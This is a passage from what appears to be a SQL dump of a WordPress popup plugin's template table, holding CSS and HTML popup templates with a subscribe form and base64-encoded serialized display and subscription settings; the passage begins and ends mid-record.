\'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #000;\r\n	font-family: \"Myriad Pro\",\"Trebuchet MS\",\"Helvetica Neue\",Helvetica,Arial,Sans-Serif;\r\n	font-size: 30px;\r\n	letter-spacing: -1px;\r\n	line-height: 40px;\r\n	letter-spacing: -1px;\r\n	font-weight: bold;\r\n	margin-top: 15px;\r\n	margin-bottom: 16px;\r\n	padding-left: 20px;\r\n	text-shadow: 0px 0px 1px #000;\r\n	-moz-text-shadow: 0px 0px 1px #000;\r\n	-webkit-text-shadow: 0px 0px 1px #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n	display: table-cell;\r\n  	width: 34%;\r\n  	height: 100%;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}), color-stop(100%, [bg_color_1])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ie10+ */\r\n  background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}\', endColorstr=\'[bg_color_1]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 30px 30px 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: 1px solid #d1b36d;\r\n  	border-radius: 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	padding-left: 10px;\r\n  	font-size: 17px;\r\n  	background-color: #fff;\r\n  	display: block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n  	\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	margin-left: -5px;\r\n  	font-size: 17px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[name=\"email\"] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/mail-icon.png\");\r\n  	background-repeat: no-repeat;\r\n  	background-position: 90% center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n  	[if bg_type_2 == \'color\']\r\n  	background: [bg_color_2];\r\n    background: -moz-linear-gradient(90deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: -webkit-linear-gradient(270deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: -o-linear-gradient(270deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: -ms-linear-gradient(270deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: linear-gradient(0deg, [bg_color_2]) 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n  	[elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	color: #fff;\r\n    font-size: 20px;\r\n    text-shadow: 2px 2px 2px #000;\r\n  	cursor: pointer;\r\n  	padding: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	float: left;\r\n  	width: 50%;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_1 {\r\n	float: right;\r\n    [if enb_txt_0]\r\n    width: 50%;\r\n    [else]\r\n    width: 100%;\r\n    [endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}','',1,1,1,1,0,0,0,'2015-01-10 17:59:43',7,0),(2,'Classy',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjI4OiJzaG93X29uX2FmdGVyX2luYWN0aXZlX3ZhbHVlIjtzOjI6IjEwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjI1OiJjbG9zZV9vbl9hZnRlcl90aW1lX3ZhbHVlIjtzOjE6IjUiO3M6MTA6InNob3dfcGFnZXMiO3M6MzoiYWxsIjtzOjc6InNob3dfdG8iO3M6ODoiZXZlcnlvbmUiO3M6Mjk6InNob3dfdG9fZmlyc3RfdGltZV92aXNpdF9kYXlzIjtzOjI6IjMwIjtzOjMwOiJzaG93X3RvX3VudGlsX21ha2VfYWN0aW9uX2RheXMiO3M6MjoiMzAiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjU5OntzOjU6IndpZHRoIjtzOjM6IjYzMCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czo5OiJiZ190eXBlXzAiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzAiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8wIjtzOjc6IiNkMWQxZDEiO3M6OToiYmdfdHlwZV8xIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18xIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMSI7czo3OiIjN2ZiNmNiIjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiIzU1NTU1NSI7czoxMDoiZm9udF90eHRfMCI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMCI7czo3OiIjNTU1NTU1IjtzOjEwOiJmb250X3R4dF8xIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8xIjtzOjc6IiM1NTU1NTUiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiM5OTk5OTkiO3M6OToiY2xvc2VfYnRuIjtzOjExOiJjbGFzc3lfZ3JleSI7czo3OiJidWxsZXRzIjtzOjExOiJjbGFzc3lfYmx1ZSI7czoxMzoiZW5iX3N1YnNjcmliZSI7czoxOiIxIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfZ3JfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfdXJsIjtzOjA6IiI7czoxNDoic3ViX2FjX2FwaV9rZXkiO3M6MDoiIjtzOjE4OiJzdWJfYXJfZm9ybV9hY3Rpb24iO3M6MDoiIjtzOjEwOiJzdWJfc2dhX2lkIjtzOjA6IiI7czoxNToic3ViX3NnYV9saXN0X2lkIjtzOjA6IiI7czoyMToic3ViX3NnYV9hY3RpdmF0ZV9jb2RlIjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fXM6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MTY6InN1Yl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHN1YnNjcmlwdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTc6IllvdSBzdWJzY3JpYmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHN1YnNjcmlwdGlvbi4gSWYgeW91IGRpZCBub3Qgc3Vic2NyaWJlIGhlcmUgLSBqdXN0IGlnbm9yZSB0aGlzIG1lc3NhZ2UuIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjM3OiJbc2l0ZW5hbWVdIFlvdXIgdXNlcm5hbWUgYW5kIHBhc3N3b3JkIjtzOjI4OiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo2NToiVXNlcm5hbWU6IFt1c2VyX2xvZ2luXTxiciAvPlBhc3N3b3JkOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MjU6InN1Yl9yZWRpcmVjdF9lbWFpbF9leGlzdHMiO3M6MDoiIjtzOjEzOiJzdWJfYnRuX2xhYmVsIjtzOjg6IlNpZ24tVXAhIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6Njoic2ltcGxlIjtzOjg6ImFuaW1fa2V5IjtzOjQ6Im5vbmUiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6MTg6IlBvcFVwIGJ5IFN1cHN5c3RpYyI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czo5OiJlbmJfdHh0XzEiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6MDoiIjtzOjU6InR4dF8wIjtzOjIwODoiPHA+UG9wdXAgYnkgU3Vwc3lzdGljIGxldHMgeW91IGVhc2lseSBjcmVhdGUgZWxlZ2FudCBvdmVybGFwcGluZyB3aW5kb3dzIHdpdGggdW5saW1pdGVkIGZlYXR1cmVzOjwvcD48dWw+PGxpPlVubGltaXRlZCBDb250ZW50IEN1c3RvbWl6YXRpb248L2xpPjxsaT5BdXRvIE9wZW4gUG9wdXBzPC9saT48bGk+Q29udGFjdCBGb3JtIHdpdGggcG9wLXVwPC9saT48L3VsPiI7czo1OiJ0eHRfMSI7czoxMjM6IjxwPjxpbWcgc3R5bGU9XCJtYXgtd2lkdGg6IDE4MHB4OyBtYXgtaGVpZ2h0OiBhdXRvO1wiIHNyYz1cIltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL3N1cHN5c3RpY19pY29uLnBuZ1wiIGFsdD1cIlwiIC8+PC9wPiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mjp7czo5OiJiZ19udW1iZXIiO3M6MToiMiI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIyIjt9fQ==','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupClassyShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose\"></a>\r\n	<div class=\"ppsPopupClassyInner\">\r\n		[if enb_label]\r\n			<div class=\"ppsPopupLabel ppsPopupClassyLabel\">[label]</div>\r\n		[endif]\r\n		[if enb_txt_0]\r\n		<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupTxt_0\">\r\n			[txt_0]\r\n		</div>\r\n		[endif]\r\n		[if enb_txt_1]\r\n		<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupTxt_1\">\r\n			[txt_1]\r\n		</div>\r\n		[endif]\r\n      	[if enb_sm]\r\n        <div class=\"ppsSm\">\r\n            [sm_html]\r\n        </div>\r\n        [endif]\r\n		<div style=\"clear: both;\"></div>\r\n	</div>\r\n	[if enb_subscribe]\r\n	<div class=\"ppsSubscribeShell\">\r\n		[sub_form_start]\r\n          	[sub_fields_html]\r\n			<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n		[sub_form_end]\r\n	</div>\r\n  	[endif]\r\n  	[if enb_foot_note]\r\n  	<div class=\"ppsFootNote\">[foot_note]</div>\r\n  	[endif]\r\n</div>','#ppsPopupShell_[ID] {\r\n  	width: [width][width_measure];\r\n	[if bg_type_0 == \'color\']\r\n	background-color: {{ popup.params.tpl.bg_color_0 }};\r\n	[elseif bg_type_0 == \'img\']\r\n	background-image: url(\"[bg_img_0]\");\r\n	background-size: 100%;\r\n  	background-repeat: no-repeat;\r\n	[endif]\r\n	padding: 7px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClassyInner {\r\n	padding: 15px;\r\n	border: {{ adjust_brightness(popup.params.tpl.bg_color_0, 30) }};\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ popup.params.tpl.bg_color_0 }}), color-stop(100%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }})); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ popup.params.tpl.bg_color_0 }}\', endColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }}\',GradientType=1 ); /* ie6-9 */\r\n	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	height: 48px;\r\n	font-size: 27px;\r\n	border: none;\r\n	padding: 1px 8px 0;\r\n	width: calc((100% - 70px) / 3);\r\n  	box-sizing: content-box;\r\n  	margin-top: 10px;\r\n  	float: left;\r\n  	display: block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	[if bg_type_0 == \'color\']\r\n	-webkit-box-shadow: inset 4px 4px 4px 0px {{ adjust_brightness(popup.params.tpl.bg_color_0, -40) }};\r\n	-moz-box-shadow: inset 4px 4px 4px 0px {{ adjust_brightness(popup.params.tpl.bg_color_0, -40) }};\r\n	box-shadow: inset 4px 4px 4px 0px {{ adjust_brightness(popup.params.tpl.bg_color_0, -40) }};\r\n	background-color: {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }};\r\n	color: {{ adjust_brightness(popup.params.tpl.bg_color_0, -100) }};\r\n	[endif]\r\n	margin-right: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n  	display: table-cell;\r\n  	height: 48px;\r\n  	vertical-align: middle;\r\n  	background-color: transparent;\r\n  	border: none;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select option {\r\n	font-size: 27px;\r\n  	color: #6d6d6d;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: calc(100% - 30px);\r\n  	height: auto;\r\n  	font-family: inherit;\r\n  	padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	color: #eee;\r\n	margin-right: 0;\r\n	cursor: pointer;\r\n	[if bg_type_1 == \'color\']\r\n	text-shadow: -1px -1px 1px {{ adjust_brightness(popup.params.tpl.bg_color_1, -80) }};\r\n	border: 1px solid {{ adjust_brightness(popup.params.tpl.bg_color_1, -40) }};\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ popup.params.tpl.bg_color_1 }}), color-stop(100%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }})); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ popup.params.tpl.bg_color_1 }}\', endColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }}\',GradientType=1 ); /* ie6-9 */\r\n\r\n	-webkit-box-shadow: inset 0px 0px 2px 2px {{ adjust_brightness(popup.params.tpl.bg_color_1, 10) }};\r\n	-moz-box-shadow: inset 0px 0px 2px 2px {{ adjust_brightness(popup.params.tpl.bg_color_1, 10) }};\r\n	box-shadow: inset 0px 0px 2px 2px {{ adjust_brightness(popup.params.tpl.bg_color_1, 10) }};\r\n	[elseif bg_type_1 == \'img\']\r\n	background-image: url(\"[bg_img_1]\");\r\n	background-size: 100%;\r\n  	background-repeat: no-repeat;\r\n	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:disabled {\r\n	color: transparent;\r\n  	cursor: progress;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	margin: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClassyLabel {\r\n	width: 100%;\r\n	text-align: center;\r\n	color: #555555;\r\n	text-shadow: 1px 1px 1px #ffffff;\r\n	font-size: 35px;\r\n	margin-top: 26px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSuccessMsg {\r\n	color: #555555;\r\n  	border: 1px solid #555555;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt {\r\n	font-size: 20px;\r\n	line-height: 160%;\r\n	color: rgb(85, 85, 85);\r\n	padding-top: 14px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	[if enb_txt_1]\r\n	width: 70%;\r\n  	float: left;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_1 {\r\n	float: right;\r\n	width: 30%;\r\n}\r\n#ppsPopupShell_[ID] ul {\r\n	margin-top: 15px;\r\n	padding-left: 0;\r\n}\r\n#ppsPopupShell_[ID] ul li {\r\n	list-style: inside none disc;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n	color: #999;\r\n    font-size: 12px;\r\n    padding-top: 10px;\r\n    text-align: center;\r\n}\r\n/*SM*/\r\n#ppsPopupShell_[ID] .ppsSm {\r\n	padding: 10px 10px 0 10px;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_1_435376 .ppsSm > div {\r\n	vertical-align: top !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm .ppsSmBtn {\r\n	margin-right: 5px;\r\n}','',1,1,1,1,0,0,0,'2015-01-03 16:00:43',19,0),(3,'Fastest and the Easiest',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjI4OiJzaG93X29uX2FmdGVyX2luYWN0aXZlX3ZhbHVlIjtzOjI6IjEwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjI1OiJjbG9zZV9vbl9hZnRlcl90aW1lX3ZhbHVlIjtzOjE6IjUiO3M6MTA6InNob3dfcGFnZXMiO3M6MzoiYWxsIjtzOjc6InNob3dfdG8iO3M6ODoiZXZlcnlvbmUiO3M6Mjk6InNob3dfdG9fZmlyc3RfdGltZV92aXNpdF9kYXlzIjtzOjI6IjMwIjtzOjMwOiJzaG93X3RvX3VudGlsX21ha2VfYWN0aW9uX2RheXMiO3M6MjoiMzAiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjYzOntzOjU6IndpZHRoIjtzOjM6Ijc3MCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czo5OiJiZ190eXBlXzAiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzAiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8wIjtzOjc6IiNlNWU1ZTUiO3M6OToiYmdfdHlwZV8xIjtzOjM6ImltZyI7czo4OiJiZ19pbWdfMSI7czozOToiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvYnV0dG9uLTEucG5nIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjA6IiI7czo5OiJiZ190eXBlXzIiO3M6MzoiaW1nIjtzOjg6ImJnX2ltZ18yIjtzOjQyOiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy9iaWctYXJyb3ctMS5wbmciO3M6MTA6ImJnX2NvbG9yXzIiO3M6MDoiIjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiIzQxNDE0MSI7czoxMDoiZm9udF90eHRfMCI7czo3OiJkZWZ